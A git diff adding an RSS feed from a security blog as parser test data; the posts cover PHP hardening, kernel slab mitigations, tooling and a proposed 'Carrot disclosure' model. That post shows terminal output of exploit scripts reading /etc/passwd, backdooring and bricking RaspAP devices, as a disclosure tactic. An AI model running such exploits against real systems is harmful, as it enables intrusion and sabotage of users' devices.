+version <code>0.10.0</code>, codename "Babar the Elephant",
+named after the <a href="https://en.wikipedia.org/wiki/Babar_the_Elephant">eponymous character</a>.
+The main new feature is the PHP8.3 support, but there are a couple of
+quality-of-life improvements for people using Snuffleupagus with fuzzers as
+well.</p>
+<h3>Changelog</h3>
+<ul>
+<li>Compatibility with PHP8.3</li>
+<li>Add <code>sp.log_max_len</code> to limit the maximum size of the log messages</li>
+<li>Add an example configuration for Xenforo 2.2.12 </li>
+<li>Url encode functions arguments when logging them</li>
+<li>Fix a possible NULL-byte truncation when outputting parameters in the logs</li>
+<li>Make <code>readonly_exec</code> play nice on readonly filesystems </li>
+</ul>
+<p>As usual, if you want to help, we have some
+<a href="https://github.com/jvoisin/snuffleupagus/issues?q=is%3Aopen+is%3Aissue+label%3A%22good+first+issue%22">low hanging fruits</a> ♥</p>
+<p>See you in your PHP stack!</p>Some notes on "Randomized slab caches for kmalloc()"2023-09-11T01:45:00+02:002023-09-11T01:45:00+02:00jvoisintag:dustri.org,2023-09-11:/b/some-notes-on-randomized-slab-caches-for-kmalloc.html<p>Ruiqi Gong and Xiu Jianfeng got their
+<a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c6152940584290668b35fa0800026f6a1ae05fe">Randomized slab caches for kmalloc()</a>
+patch series merged upstream, and I've had enough discussions about it to
+warrant summarising them into a small blogpost.</p>
+<p>The main idea is to have multiple slab caches, and pick one at random based on
+the address of …</p><p>Ruiqi Gong and Xiu Jianfeng got their
+<a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c6152940584290668b35fa0800026f6a1ae05fe">Randomized slab caches for kmalloc()</a>
+patch series merged upstream, and I've had enough discussions about it to
+warrant summarising them into a small blogpost.</p>
+<p>The main idea is to have multiple slab caches, and pick one at random based on
+the address of code calling <code>kmalloc()</code> and a per-boot seed, to make heap-spraying harder.
+It's a great idea, but comes with some shortcomings for now:</p>
+<ul>
+<li>Objects being allocated via wrappers around <code>kmalloc()</code>, like <code>sock_kmalloc</code>,
+ <code>f2fs_kmalloc</code>, <code>aligned_kmalloc</code>, … will end up in the same slab cache.</li>
+<li>The slabs need to be pinned, otherwise an attacker could <a href="https://en.wikipedia.org/wiki/Heap_feng_shui">feng-shui</a> their way
+ into having the whole slab free'ed, garbage-collected, and have a slab for
+ another type allocated at the same VA. <a href="https://thejh.net/">Jann Horn</a> and <a href="https://infosec.exchange/@nspace">Matteo Rizzo</a> have a <a href="https://github.com/torvalds/linux/compare/master...thejh:linux:slub-virtual-upstream">nice
+ set of patches</a>,
+ discussed a bit in <a href="https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html">this Project Zero blogpost</a>,
+ for a feature called <a href="https://github.com/torvalds/linux/commit/f3afd3a2152353be355b90f5fd4367adbf6a955e"><code>SLAB_VIRTUAL</code></a>,
+ implementing precisely this.</li>
+<li>There are 16 slabs by default, so one chance out of 16 to end up in the same
+ slab cache as the target.</li>
+<li>There are no guard pages between caches, so inter-caches overflows are
+ possible.</li>
+<li>As pointed out by <a href="https://twitter.com/andreyknvl/status/1700267669336080678">andreyknvl</a>
+ and <a href="https://infosec.exchange/@minipli/111045336853055793">minipli</a>,
+ the fewer allocations hitting a given cache means less noise,
+ so it might even help with some heap feng-shui.</li>
+<li>minipli also pointed out that "randomized caches still freely
+ mix kernel allocations with user controlled ones (<code>xattr</code>, <code>keyctl</code>, <code>msg_msg</code>, …).
+ So even though merging is disabled for these caches, i.e. no direct overlap
+ with <code>cred_jar</code> etc., other object types can still be targeted (<code>struct
+ pipe_buffer</code>, BPF maps, its verifier state objects,…). It’s just a matter of
+ probing which allocation index the targeted object falls into.",
+ but I considered this out of scope, since it's much more involved;
+ albeit something like Jann Horn's <a href="https://github.com/thejh/linux/blob/slub-virtual/MITIGATION_README"><code>CONFIG_KMALLOC_SPLIT_VARSIZE</code></a>
+ wouldn't significantly increase complexity.</li>
+</ul>
+<p>Also, while code addresses as a source of entropy have historically been a great
+way to provide <a href="https://lwn.net/Articles/569635/">KASLR</a> bypasses, <code>hash_64(caller ^
+random_kmalloc_seed, ilog2(RANDOM_KMALLOC_CACHES_NR + 1))</code> shouldn't trivially
+leak offsets.</p>
+<p>The segregation technique is a bit like a weaker version of grsecurity's
+<a href="https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game">AUTOSLAB</a>,
+or a weaker kernel-land version of
+<a href="https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/PartitionAlloc.md">PartitionAlloc</a>,
+but to be fair, making use-after-free exploitation harder, and significantly
+harder once pinning lands, with only ~150 lines of code and negligible
+performance impact is amazing and should be praised. Moreover, I wouldn't be
+surprised if this was backported in <a href="https://google.github.io/security-research/kernelctf/rules.html">Google's KernelCTF</a>
+soon, so we should see if my analysis is correct.</p>Making use of pygments' filters with Pelican2023-09-01T18:30:00+02:002023-09-01T18:30:00+02:00jvoisintag:dustri.org,2023-09-01:/b/making-use-of-pygments-filters-with-pelican.html<p>I've been using <a href="https://github.com/getpelican/pelican">Pelican</a>
+more or less since the beginning of this blog and I'm still
+pretty happy about it. Mostly because of how <a href="https://boringtechnology.club">boring</a>
+it is, and its complete absence of fundamental changes throughout the years.</p>
+<p>Anyway, I was looking at how to reduce the size of the pages …</p><p>I've been using <a href="https://github.com/getpelican/pelican">Pelican</a>
+more or less since the beginning of this blog and I'm still
+pretty happy about it. Mostly because of how <a href="https://boringtechnology.club">boring</a>
+it is, and its complete absence of fundamental changes throughout the years.</p>
+<p>Anyway, I was looking at how to reduce the size of the pages of my blog
+and looked at how code is syntactically highlighted:
+Pelican is using <a href="https://pygments.org">Pygments</a> to do this,
+and looking at its documentation, the <a href="https://pygments.org/docs/filters/#TokenMergeFilter">TokenMergeFilter</a>
+should help a bit, by merging token of the same type together,
+instead of highlighting them separately.</p>
+<p>Pelican's documentation <a href="https://docs.getpelican.com/en/stable/settings.html">says</a>
+that options can be passed to python-markdown like this:
+<code>MARKDOWN = { 'extension_configs': { 'markdown.extensions.codehilite': {'css_class': 'highlight'} } }</code>.</p>
+<p>Looking at <a href="https://python-markdown.github.io/">python-markdown</a>'s <a href="https://python-markdown.github.io/reference/#markdown">one</a>,
+one can pass various things as parameters, but it doesn't mention filters.
+<a href="https://pygments.org/docs/filters/">Pygments documentation on this topic</a> implies
+that the only way to add filters is to use the <code>add_filter</code> method on a lexer.</p>
+<p>But <a href="https://github.com/pygments/pygments/blob/master/pygments/lexer.py">looking at the code</a>
+as suggested <a href="https://github.com/Python-Markdown/markdown/issues/1322#issuecomment-1453911760">here</a>,
+filters can be passed like any other options, meaning that one only needs to
+add the following code into the <code>pelicanconf.py</code> file to use the
+<code>TokenMergeFilter</code>:</p>
+<div class="codehilite"><pre><span></span><code><span class="kn">from</span> <span class="nn">pygments.filters</span> <span class="kn">import</span> <span class="n">TokenMergeFilter</span>
+
+<span class="n">MARKDOWN</span> <span class="o">=</span> <span class="p">{</span>
+ <span class="s1">'extension_configs'</span><span class="p">:</span> <span class="p">{</span>
+ <span class="s1">'markdown.extensions.codehilite'</span><span class="p">:</span> <span class="p">{</span>
+ <span class="s1">'filters'</span><span class="p">:</span> <span class="p">[</span><span class="n">TokenMergeFilter</span><span class="p">()]</span>
+ <span class="p">}</span>
+ <span class="p">}</span>
+<span class="p">}</span>
+</code></pre></div>
+
+<p>Totally worth the effort for a marginal page size reduction!</p>Book review: Hacks, Leaks, and Revelations2023-08-16T16:15:00+02:002023-08-16T16:15:00+02:00jvoisintag:dustri.org,2023-08-16:/b/book-review-hacks-leaks-and-revelations.html<p><a href="https://nostarch.com/hacks-leaks-and-revelations"><img alt="Hacks, Leaks, and Revelations cover" src="https://dustri.org/b/images/HacksLeaksReveleations.png"></a></p>
+<p>Last month, I got an email <a href="https://nostarch.com/about">from Briana Blackwell from No Starch Press</a>'s marketing department,
+telling me that <a href="https://hacksandleaks.com/">Hacks, Leaks, and Revelations: The Art of Analyzing Hacked and Leaked Data</a>
+by <a href="https://micahflee.com/">Micah Lee</a>
+was available in <em>early access</em>, and that they'd be happy to send me an ebook
+copy …</p><p><a href="https://nostarch.com/hacks-leaks-and-revelations"><img alt="Hacks, Leaks, and Revelations cover" src="https://dustri.org/b/images/HacksLeaksReveleations.png"></a></p>
+<p>Last month, I got an email <a href="https://nostarch.com/about">from Briana Blackwell from No Starch Press</a>'s marketing department,
+telling me that <a href="https://hacksandleaks.com/">Hacks, Leaks, and Revelations: The Art of Analyzing Hacked and Leaked Data</a>
+by <a href="https://micahflee.com/">Micah Lee</a>
+was available in <em>early access</em>, and that they'd be happy to send me an ebook
+copy free of charge!</p>
+<p>From the couple of interactions I had with him, Lee is not only a great human being,
+but also technically literate. He's the director of information security
+at <a href="https://theintercept.com/staff/micah-lee/">The Intercept</a>, and the person
+behind <a href="https://onionshare.org/">OnionShare</a> and <a href="https://dangerzone.rocks/">DangerZone</a>;
+so I was thrilled to finally get my hands on his book!</p>
+<p>And what a great one it is! It's a complete course for everyone who wants to learn how to properly deal with and report on large data sets like leaks:
+How to communicate with sources along with some notions of <a href="https://en.wikipedia.org/wiki/Operations_security">opsec</a>,
+some words on the ethics of dealing with this kind of data,
+how to get data leaks and how to analyse them
+properly and safely, wrangling tools like
+<a href="https://github.com/freedomofpress/dangerzone">dangerzone</a>,
+a <a href="https://en.wikipedia.org/wiki/BitTorrent">BitTorrent</a> client,
+<a href="https://signal.org">Signal</a>,
+<a href="https://torproject.org">Tor</a> via the <a href="https://www.torproject.org/download/">Tor Browser</a> and
+<a href="https://onionshare.org/">Onionshare</a>,
+some <a href="https://en.wikipedia.org/wiki/Linux">linux</a> and <a href="https://en.wikipedia.org/wiki/Shell_(computing)">shell</a> basics,
+a crash course into data analysis with <a href="https://python.org">Python</a> and <a href="https://en.wikipedia.org/wiki/SQL">SQL</a>,
+the <a href="https://occrp.org/en">OCCRP</a>'s <a href="https://docs.aleph.occrp.org/">Aleph</a>,
+…
+with hands-on exercises and reporting examples based on real leaks like
+<a href="https://en.wikipedia.org/wiki/2021_Epik_data_breach">EpikFail</a>,
+<a href="https://en.wikipedia.org/wiki/BlueLeaks">BlueLeaks</a>,
+the <a href="https://apnews.com/article/oath-keepers-leaked-membership-rolls-2ca4195ed3a10e45dd189bf98f3e5a26">Oath Keepers leak</a>,
+<a href="https://discordleaks.unicornriot.ninja/discord/">Unicorn Riot's DiscordLeaks</a>,
+<a href="https://theintercept.com/2021/09/28/covid-telehealth-hydroxychloroquine-ivermectin-hacked/">AFLDS</a>,
+the <a href="https://www.databreaches.net/heritage-foundation-wasnt-attacked-they-leaked-their-own-data/">Heritage Foundation emails</a>,
+…</p>
+<p>It's a comprehensive yet highly digestible resource that I would wholeheartedly
+recommend to anyone remotely interested in modern journalism practices. Hacked
+and dumped databases are all around the internet, waiting to be analysed, reported on,
+contextualised and exposed, and with this book, anyone could help with
+the effort of making the world a better place: sunlight is the best
+disinfectant!</p>mat2 0.13.42023-08-02T21:30:00+02:002023-08-02T21:30:00+02:00jvoisintag:dustri.org,2023-08-02:/b/mat2-0134.html<p>There is a new minor version of mat2:
+<a href="https://0xacab.org/jvoisin/mat2/tags/0.13.4">0.13.4</a>. No ground breaking
+changes, only minor improvements, code modernisation and a bit of hardening:</p>
+<ul>
+<li>Add documentation about mat2 on OSX</li>
+<li>Make use of python3.7 constructs to simplify code</li>
+<li>Use moderner type annotations</li>
+<li>Harden <code>get_meta</code> in archive.py against …</li></ul><p>There is a new minor version of mat2:
+<a href="https://0xacab.org/jvoisin/mat2/tags/0.13.4">0.13.4</a>. No ground breaking
+changes, only minor improvements, code modernisation and a bit of hardening:</p>
+<ul>
+<li>Add documentation about mat2 on OSX</li>
+<li>Make use of python3.7 constructs to simplify code</li>
+<li>Use moderner type annotations</li>
+<li>Harden <code>get_meta</code> in archive.py against variants of <a href="https://cve.circl.lu/cve/CVE-2022-35410">CVE-2022-35410</a></li>
+<li>Improve MSOffice document support</li>
+<li>Package the manpage on PyPI.</li>
+</ul>
+<p>Thanks to <a href="https://anelki.net/">akierig</a>, mat2 is now <a href="https://github.com/macports/macports-ports/pull/18072">available</a> in <a href="https://trac.macports.org/">macports</a>!</p>
+<p>As usual, if you know some python, help is
+<a href="https://0xacab.org/jvoisin/mat2/issues?label_name%5B%5D=good+first+issue">welcome</a>.</p>A sneaky Golang bug2023-08-02T13:15:00+02:002023-08-02T13:15:00+02:00jvoisintag:dustri.org,2023-08-02:/b/a-sneaky-golang-bug.html<p>Today at work, I needed a function in <a href="https://go.dev/">Go</a> to remove
+duplicates from a slice, and thus wrote something like this using the
+<a href="https://go.dev/doc/tutorial/generics">generic</a>-based
+<a href="https://pkg.go.dev/golang.org/x/exp/slices">slices</a> package:</p>
+<div class="codehilite"><pre><span></span><code><span class="kd">func</span><span class="w"> </span><span class="nx">removeDuplicates</span><span class="p">(</span><span class="nx">s</span><span class="w"> </span><span class="p">[]</span><span class="nx">mytype</span><span class="p">)</span><span class="w"> </span><span class="p">[]</span><span class="nx">mytype</span><span class="w"> </span><span class="p">{</span>
+<span class="w"> </span><span class="nx">slices</span><span class="p">.</span><span class="nx">SortFunc</span><span class="p">(</span><span class="nx">s</span><span class="p">,</span><span class="w"> </span><span class="nx">less</span><span class="p">)</span>
+<span class="w"> </span><span class="nx">slices</span><span class="p">.</span><span class="nx">CompactFunc</span><span class="p">(</span><span class="nx">s</span><span class="p">,</span><span class="w"> </span><span class="nx">eq</span><span class="p">)</span>
+<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">s</span>
+<span class="p">}</span>
+</code></pre></div>
+
+<p>Can you spot the bug? Here are the …</p><p>Today at work, I needed a function in <a href="https://go.dev/">Go</a> to remove
+duplicates from a slice, and thus wrote something like this using the
+<a href="https://go.dev/doc/tutorial/generics">generic</a>-based
+<a href="https://pkg.go.dev/golang.org/x/exp/slices">slices</a> package:</p>
+<div class="codehilite"><pre><span></span><code><span class="kd">func</span><span class="w"> </span><span class="nx">removeDuplicates</span><span class="p">(</span><span class="nx">s</span><span class="w"> </span><span class="p">[]</span><span class="nx">mytype</span><span class="p">)</span><span class="w"> </span><span class="p">[]</span><span class="nx">mytype</span><span class="w"> </span><span class="p">{</span>
+<span class="w"> </span><span class="nx">slices</span><span class="p">.</span><span class="nx">SortFunc</span><span class="p">(</span><span class="nx">s</span><span class="p">,</span><span class="w"> </span><span class="nx">less</span><span class="p">)</span>
+<span class="w"> </span><span class="nx">slices</span><span class="p">.</span><span class="nx">CompactFunc</span><span class="p">(</span><span class="nx">s</span><span class="p">,</span><span class="w"> </span><span class="nx">eq</span><span class="p">)</span>
+<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">s</span>
+<span class="p">}</span>
+</code></pre></div>
+
+<p>Can you spot the bug? Here are the prototypes of the two functions:</p>
+<div class="codehilite"><pre><span></span><code><span class="kd">func</span><span class="w"> </span><span class="nx">SortFunc</span><span class="p">[</span><span class="nx">E</span><span class="w"> </span><span class="kt">any</span><span class="p">](</span><span class="nx">x</span><span class="w"> </span><span class="p">[]</span><span class="nx">E</span><span class="p">,</span><span class="w"> </span><span class="nx">less</span><span class="w"> </span><span class="kd">func</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span><span class="w"> </span><span class="nx">b</span><span class="w"> </span><span class="nx">E</span><span class="p">)</span><span class="w"> </span><span class="kt">bool</span><span class="p">)</span>
+<span class="kd">func</span><span class="w"> </span><span class="nx">CompactFunc</span><span class="p">[</span><span class="nx">S</span><span class="w"> </span><span class="o">~</span><span class="p">[]</span><span class="nx">E</span><span class="p">,</span><span class="w"> </span><span class="nx">E</span><span class="w"> </span><span class="kt">any</span><span class="p">](</span><span class="nx">s</span><span class="w"> </span><span class="nx">S</span><span class="p">,</span><span class="w"> </span><span class="nx">eq</span><span class="w"> </span><span class="kd">func</span><span class="p">(</span><span class="nx">E</span><span class="p">,</span><span class="w"> </span><span class="nx">E</span><span class="p">)</span><span class="w"> </span><span class="kt">bool</span><span class="p">)</span><span class="w"> </span><span class="nx">S</span>
+</code></pre></div>
+
+<p>The first has no return value, while the second does, unused in our case, hence
+the bug. It's <em>interesting</em> to note that the go compiler is perfectly happy
+with this, and doesn't issue any warning: it was <em>extraordinarily fun</em> to pinpoint.</p>
+<p>I reached out to <a href="https://airs.com/ian/">Ian Lance Taylor</a> who
+<a href="https://cs.opensource.google/go/x/exp/+/03df57b9a50843fbf23bf90375d6584bcc8ea13d">implemented</a>
+those functions in 2021 and he pointed me to <a href="https://go.dev/blog/slices-intro">Go Slices: usage and internals
+</a>. Things indeed do become obvious once
+looking at the <a href="https://github.com/golang/go/blob/master/src/runtime/slice.go">implementation of
+<code>slice</code></a>:</p>
+<div class="codehilite"><pre><span></span><code><span class="kd">type</span><span class="w"> </span><span class="nx">slice</span><span class="w"> </span><span class="kd">struct</span><span class="w"> </span><span class="p">{</span>
+<span class="w"> </span><span class="nx">array</span><span class="w"> </span><span class="nx">unsafe</span><span class="p">.</span><span class="nx">Pointer</span>
+<span class="w"> </span><span class="nx">len</span><span class="w"> </span><span class="kt">int</span>
+<span class="w"> </span><span class="nx">cap</span><span class="w"> </span><span class="kt">int</span>
+<span class="p">}</span>
+</code></pre></div>
+
+<p>Both <code>slices.SortFunc</code> and <code>slices.CompactFunc</code> are taking a slice as
+parameter, and not a pointer to a slice, meaning that any changes to <code>len</code> and
+<code>cap</code> will be local to the function.</p>
+<p>Anyway, there is a <a href="https://github.com/golang/go/issues/20803">proposal</a> to require
+return values to be explicitly used or ignored open since 2017, but it didn't
+go anywhere for now. There is also <a href="https://github.com/golang/go/issues/20148">another proposal</a>
+to make <code>go vet</code> better at highlighting error mishandling, as well as <a href="https://github.com/kisielk/errcheck">errcheck</a>,
+but those wouldn't really help in this case.</p>
\ No newline at end of file
diff --git a/internal/reader/parser/testdata/large_rss.xml b/internal/reader/parser/testdata/large_rss.xml
new file mode 100644
index 00000000..53cec06f
--- /dev/null
+++ b/internal/reader/parser/testdata/large_rss.xml
@@ -0,0 +1,1472 @@
+
+Artificial truthhttps://dustri.org/b/Sun, 10 Mar 2024 17:15:00 +0100Using vale with vimhttps://dustri.org/b/using-vale-with-vim.html<p><a href="https://en.wikipedia.org/wiki/LWN.net">LWN</a> recently published an excellent
+(subscriber only) <a href="https://lwn.net/Articles/964075/">article</a> on
+<a href="https://vale.sh/">vale</a>, an <em>editorial style</em> linter. One of the original goals
+of this little corner on the internet was to improve my English, a purpose it
+keeps serving. Adding some lightweight tooling to my text editor to push this
+goal even further sounds great.</p>
+<p>Like all good software, vale <a href="https://gitlab.alpinelinux.org/alpine/aports/-/tree/master/testing/vale">is
+packaged</a>
+in Alpine, although it looked a tad neglected, so I sent <a href="https://gitlab.alpinelinux.org/alpine/aports/-/merge_requests/61919">a
+pull-request</a>
+to get it updated.
+Its configuration is pretty straightforward: a <code>~/.vale.ini</code> file, with
+where to store/read its data and some preferences. It comes with a
+<a href="https://vale.sh/hub/">couple of <em>packages</em></a> for popular styles, like the ones
+from <a href="https://vale.sh/hub/microsoft/">Microsoft</a>,
+<a href="https://vale.sh/hub/google/">Google</a>, <a href="https://vale.sh/hub/redhat/">RedHat</a>, … then a simple <code>vale sync</code> to force it to
+download and store the data, and you're good to go.</p>
+<p>While <code>vale</code> can be called from the command line, integration with my text
+editor is way more comfy. I'm sure there are a ton of plugins to integrate it
+with vim, but I'm not a huge fan of having my text editor run arbitrary code
+from the internet, so I threw the following 6 lines in <a href="https://dustri.org/pub/vimrc">my vimrc</a> instead:</p>
+<div class="codehilite"><pre><span></span><code><span class="nv">augroup</span><span class="w"> </span><span class="nv">vale</span>
+<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="nv">filereadable</span><span class="ss">(</span><span class="nv">expand</span><span class="ss">(</span><span class="s2">"~/.vale.ini"</span><span class="ss">))</span>
+<span class="w"> </span><span class="nv">autocmd</span><span class="w"> </span><span class="nv">FileType</span><span class="w"> </span><span class="nv">markdown</span><span class="w"> </span><span class="nv">setlocal</span><span class="w"> </span><span class="nv">makeprg</span><span class="o">=</span><span class="nv">vale</span>\<span class="w"> </span><span class="o">--</span><span class="nv">output</span><span class="o">=</span><span class="nv">line</span>\<span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="nv">errorformat</span><span class="o">=%</span><span class="nv">f</span>:<span class="o">%</span><span class="nv">l</span>:<span class="o">%</span><span class="nv">c</span>:<span class="o">%</span><span class="nv">o</span>:<span class="o">%</span><span class="nv">m</span>
+<span class="w"> </span><span class="nv">nnoremap</span><span class="w"> </span><span class="o"><</span><span class="nv">Leader</span><span class="o">></span><span class="nv">M</span><span class="w"> </span>:<span class="nv">make</span><span class="o"><</span><span class="nv">CR</span><span class="o">><</span><span class="nv">CR</span><span class="o">></span>
+<span class="w"> </span><span class="k">end</span>
+<span class="nv">augroup</span><span class="w"> </span><span class="k">end</span>
+</code></pre></div>
+
+<p>It checks if I have a <code>~/.vale.ini</code> file, and if so sets
+<a href="https://vimhelp.org/options.txt.html#%27makeprg%27"><code>makeprg</code></a> to vale, and
+configures <a href="https://vimhelp.org/quickfix.txt.html#errorformat"><code>errorformat</code></a> to
+properly parse vale's output. Now every time I type <code><Leader> M</code>, I get vale's
+diagnostics in my <a href="https://vimhelp.org/quickfix.txt.html">quickfix window</a>.</p>
+<p>The next steps would likely be to <s>waste</s> spend some time improving the theme
+of the aforementioned window, add some ad hoc rules to vale, and maybe try to
+show the diagnostics inline like the spellchecker is doing.</p>jvoisinSun, 10 Mar 2024 17:15:00 +0100tag:dustri.org,2024-03-10:/b/using-vale-with-vim.htmlsysadminCarrot disclosurehttps://dustri.org/b/carrot-disclosure.html<p>Once you have found a vulnerability, you can either sit on it, or disclose it.
+There are usually two ways to disclose, with minor variations:</p>
+<ol>
+<li><a href="https://en.wikipedia.org/wiki/Coordinated_vulnerability_disclosure">Coordinated Disclosure</a>,
+ where one gives time to the vendor to issue a fix before disclosing</li>
+<li><a href="https://en.wikipedia.org/wiki/Full_disclosure_(computer_security)">Full Disclosure</a>,
+ where one discloses immediately without notifying anyone before.</li>
+</ol>
+<p>I would like to coin a 3<sup>rd</sup> one: <em>Carrot Disclosure</em>, dangling a
+<a href="https://en.wikipedia.org/wiki/Carrot_and_stick">metaphorical carrot</a> in front
+of the vendor to incentivise change. The main idea is to only publish the
+(redacted) output of the exploit for a critical vulnerability, to showcase that the
+software is exploitable. Now the vendor has two choices: either perform a
+holistic audit of its software, fixing as many issues as possible in the hope
+of fixing the showcased vulnerability; or losing users who might not be happy
+running a known-vulnerable software. Users of this disclosure model are of
+course called Bugs Bunnies.</p>
+<p>We all looked at catastrophic web applications, finding a ton
+of bugs, and deciding not to bother with reporting them, because there were too
+many of them, because we knew that there will be more of them lurking, because
+the vendor is a complete tool and it would take more time trying to properly
+disclose things than it took finding the vulnerabilities, … This is an
+excellent use case for Carrot Disclosure! Of course, for unauditably-large
+codebases, it doesn't work: you've got a Linux LPE, who cares.</p>
+<p>Interestingly, it shifts the work balance a bit: it's usually harder to write
+an exploit than it is to fix the bug. But here, the vendor has to audit and fix
+its entire codebase, for the ~low cost of one (1) exploit, that you don't even
+have to publish if you don't want to.</p>
+<p>If you want to be extra-nice, you can:</p>
+<ul>
+<li>Publish the SHA256 of the exploit, to prove
+ that you weren't making things up, once it's fixed or if you get sued for
+ whatever frivolous reasons like libel.</li>
+<li>Maintain the exploits against new versions, proving that the exploit is still
+ working.</li>
+<li>Publish the exploit once it has been fixed, otherwise you risk to have
+ vendors call your bluff next time, or at least notify that the issue has been
+ fixed. Since you don't have hardcoded offsets because we're in 2024, you can even
+ put this in a continuous integration.</li>
+</ul>
+<p>Let's have an example, as a treat. A couple of shitty vulnerabilities for
+<a href="https://raspap.com/">RaspAP</a> that took me 5 minutes to find and at least 5
+more to write an exploit for each of them:</p>
+<div class="codehilite"><pre><span></span><code><span class="gp">$ </span>./read-raspap.py<span class="w"> </span><span class="m">10</span>.3.141.1<span class="w"> </span>/etc/passwd<span class="w"> </span><span class="p">|</span><span class="w"> </span>head<span class="w"> </span>-n<span class="w"> </span><span class="m">5</span>
+<span class="go">[+] Target is running RaspAP</span>
+<span class="go">[+] Dumping /etc/passwd</span>
+<span class="go">root:x:0:0:root:/root:/bin/bash</span>
+<span class="go">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span>
+<span class="go">bin:x:2:2:bin:/bin:/usr/sbin/nologin</span>
+<span class="gp">$ </span>./authed-mitm-raspap.py<span class="w"> </span><span class="m">10</span>.3.141.1
+<span class="go">[+] default login/password in use</span>
+<span class="go">[+] backdooring system…</span>
+<span class="go">[+] system backdoored, enjoy your permanent MITM!</span>
+<span class="gp">$ </span>./brick-raspap.py<span class="w"> </span><span class="m">10</span>.3.141.1
+<span class="go">[+] Target is running RaspAP</span>
+<span class="go">[+] Bricking the system…</span>
+<span class="go">[+] System bricked!</span>
+<span class="gp">$</span>
+</code></pre></div>
+
+<p>It looks like there is a low-hanging unauthenticated arbitrary code execution
+chainable with a privilege escalation to root as well, but since writing an
+exploit would take more than 5 minutes, I can't be bothered, and odds are that
+it'll be fixed along with the persistent denial-of-service anyway. Let me know
+when you think those are fixed.</p>jvoisinFri, 08 Mar 2024 21:30:00 +0100tag:dustri.org,2024-03-08:/b/carrot-disclosure.htmlsecurityYoutube video embedding harm reductionhttps://dustri.org/b/youtube-video-embedding-harm-reduction.html<p>Embedding external content on a website in the current enshittocene period is
+more annoying than ever, so here is a copy-pasteable snippet to embed a youtube
+video while reducing its tracking and nuisance capabilities as much as possible:</p>
+<div class="codehilite"><pre><span></span><code><span class="p"><</span><span class="nt">iframe</span>
+ <span class="na">credentialless</span>
+ <span class="na">allowfullscreen</span>
+ <span class="na">referrerpolicy</span><span class="o">=</span><span class="s">"no-referrer"</span>
+ <span class="na">sandbox</span><span class="o">=</span><span class="s">"allow-scripts allow-same-origin"</span>
+ <span class="na">allow</span><span class="o">=</span><span class="s">"accelerometer 'none'; ambient-light-sensor 'none'; autoplay 'none'; battery 'none'; bluetooth 'none'; browsing-topics 'none'; camera 'none'; ch-ua 'none'; display-capture 'none'; domain-agent 'none'; document-domain 'none'; encrypted-media 'none'; execution-while-not-rendered 'none'; execution-while-out-of-viewport 'none'; gamepad 'none'; geolocation 'none'; gyroscope 'none'; hid 'none'; identity-credentials-get 'none'; idle-detection 'none'; keyboard-map 'none'; local-fonts 'none'; magnetometer 'none'; microphone 'none'; midi 'none'; navigation-override 'none'; otp-credentials 'none'; payment 'none'; picture-in-picture 'none'; publickey-credentials-create 'none'; publickey-credentials-get 'none'; screen-wake-lock 'none'; serial 'none'; speaker-selection 'none'; sync-xhr 'none'; usb 'none'; web-share 'none'; window-management 'none'; xr-spatial-tracking 'none'"</span><span class="err">,</span>
+ <span class="na">csp</span><span class="o">=</span><span class="s">"sandbox allow-scripts allow-same-origin;"</span>
+ <span class="na">width</span><span class="o">=</span><span class="s">"560"</span>
+ <span class="na">height</span><span class="o">=</span><span class="s">"315"</span>
+ <span class="na">src</span><span class="o">=</span><span class="s">"https://www.youtube-nocookie.com/embed/jfKfPfyJRdk"</span>
+ <span class="na">title</span><span class="o">=</span><span class="s">"lofi hip hop radio 📚 - beats to relax/study to"</span>
+ <span class="na">frameborder</span><span class="o">=</span><span class="s">"0"</span>
+ <span class="na">loading</span><span class="o">=</span><span class="s">"lazy"</span>
+<span class="p">></</span><span class="nt">iframe</span><span class="p">></span>
+</code></pre></div>
+
+<ul>
+<li><a href="https://developer.mozilla.org/en-US/docs/Web/Security/IFrame_credentialless"><code>credentialless</code></a> to load youtube in a blank disposable context,
+ without access to the origin's network, cookies, and storage data.</li>
+<li><code>allowfullscreen</code> because some people like it</li>
+<li><code>referrerpolicy</code> set to not leak your <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referer">referer</a></li>
+<li><code>sandbox</code> to only allow javascript execution and SOP. Downloads, forms,
+ modals, screen orientation, pointer lock, popups, presentation session,
+ <a href="https://developer.mozilla.org/en-US/docs/Web/API/Storage_Access_API">storage access</a> and thus third-party cookies,
+ top-navigation, … are all denied.</li>
+<li><code>allow</code> with <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Permissions-Policy#directives">every single directive</a>
+ set to "absolutely-fucking-not", and yes, they have to be all set one by one,
+ and checked regularly in case new directives were added,
+ because there is <a href="https://github.com/w3c/webappsec-permissions-policy/issues/208">no deny-all</a>
+ in the <a href="https://w3c.github.io/webappsec-permissions-policy/">spec</a>. It seems
+ that every browser has its own list of directives, chrome is using <a href="https://github.com/w3c/webappsec-permissions-policy/blob/main/features.md">this one</a>
+ while firefox prefers the <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Permissions-Policy#directives">MDN one</a>,
+ and of course the two differ. No doubt this was designed with privacy, simplicity, maintainability and security in mind.</li>
+<li><code>src</code> set to <code>www.youtube-nocookie.com</code> instead of <code>youtube.com</code>. Both
+ are official Google urls, but the former doesn't do tracking via cookies,
+ and disables API and interaction and interaction logging. Amusingly, it's
+ the player used on <code>whitehouse.gov</code>.</li>
+<li><code>csp</code> set to <code>sandbox allow-scripts allow-same-origin;</code> for compatibility's
+ sake, just in case.
+ I'd love to use a more restrictive policy, but the spec doesn't allow to
+ provide one, except if the embedded website explicitly allows it, and of
+ course youtube doesn't.</li>
+<li><code>loading="lazy"</code> in case people don't scroll far enough to see the video, no
+ need to make them do queries to Google for no reasons.</li>
+</ul>
